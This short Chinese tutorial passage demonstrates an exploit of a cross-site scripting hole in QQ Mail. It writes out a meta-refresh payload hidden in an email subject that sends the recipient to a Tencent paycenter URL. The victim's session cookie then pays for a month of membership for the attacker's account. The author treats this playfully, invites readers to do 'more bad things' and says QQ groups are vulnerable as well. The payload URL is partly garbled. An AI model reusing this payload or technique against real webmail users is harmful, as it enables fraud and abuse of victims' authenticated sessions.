就拿QQ邮箱的跨站脚本漏洞来举例。我们发送一封恶意邮件,在邮件标题上写入:你好想和你做个朋友可以吗
CONTENT="0;URL=http://paycenter.qq.com/cgi-bin/paypresent.cgi?service_type=clubamp;subtype=1amp;month=1amp;uin1=47563 34amp;uin2=4756334leaveword=123"
当别人收到邮件以后从邮件标题上看,完全看不出破绽,如图:

可是当点开邮件的时候,藏在标题中的代码就会执行,这段代码的意思是立刻转移到 http://paycenter.qq.com/cgi-bin/paypresent.cgi?service_type= clubamp;subtype=1amp;month=1amp;uin1=4756334amp;uin2=475 6334leaveword=123
这个url的意思是给4756334这个号码购买一个月的会员服务,留言内容是123。这时由于用户cookie中有用户的加密身份验证串,自然就会顺利用过,如图:

哈哈,我是穷人,一个月的会员也买不起的:P
呵呵。这个只是举个例子而已。其实我们引申一下可以做更多的坏事。只要是脚本和html代码可以做的,我们全都可以做:)比如跳转到其他网站的网页,做了XX的事情再跳回来。嘿嘿。大家自己去想吧
QQ群的跨站漏洞也可以:)
